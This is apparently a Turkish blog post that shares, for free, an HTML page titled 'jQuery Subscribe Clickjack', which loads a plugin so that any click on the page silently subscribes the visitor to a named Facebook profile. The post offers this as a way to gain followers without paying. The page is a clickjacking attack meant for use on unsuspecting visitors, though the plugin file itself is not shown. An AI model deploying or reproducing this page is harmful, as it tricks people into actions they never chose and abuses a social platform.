Facebook otomatik likekodundan sonra şimdide otamatik abone yapma kodu çıktı.Facebook abonelik nedir ? diye soracak olursanız.Hiç birşey değil,sadece arkadaş olamadığınız kişilerin ne paylaştığını görebiliyorsunuz.Yine de bunu birşey sanıp artırmaya çalışanlar var.Para verenlerde var 🙂 Vermeyin kardeşim para buyrun ücretsizi burada.Tüm kaynak kodları paylaşıyorum.

<!DOCTYPE html> <head>         <title>jQuery Subscribe Clickjack </title>         <meta http-equiv="content-type" content="text/html;charset=utf-8" />         <script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.7.1/jquery.min.js"></script>         <script type="text/javascript" src="jquery.autosubscribe.js"></script>         <script type="text/javascript">         $(document).ready(function () {                 $.otoabone({                         profile: 'https://www.facebook.com/craladam',                         opacity: '1'                 });         });</script> </head> <body>         <h1>Subscribe Clickjack</h1>         Click anywhere on this page :) </body> </html>